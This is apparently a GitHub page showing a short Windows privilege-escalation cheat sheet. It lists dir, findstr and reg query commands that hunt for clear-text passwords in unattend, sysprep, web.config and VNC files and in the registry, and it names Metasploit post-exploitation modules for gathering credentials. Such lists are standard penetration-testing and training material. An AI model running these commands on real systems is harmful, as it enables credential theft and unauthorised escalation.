-
Notifications
You must be signed in to change notification settings - Fork 29
/
PrivEsc - Clear Text passwords
33 lines (25 loc) · 1.04 KB
/
PrivEsc - Clear Text passwords
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
-------------------------------------------------------------------------------
# find the full path for the important files
C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini
-------------------------------------------------------------------------------
# find the keyword "password" in all files
findstr /spin "password" *.*
# discover files that contain the keyword "password" in the following extensions
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
# Metasploit module to discover credentials via unattended installations
post/windows/gather/enum_unattend
-------------------------------------------------------------------------------
# find passwords stored in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
-------------------------------------------------------------------------------
# meterpreter
post/windows/gather/credentials/gpp
post/windows/gather/enum_unattend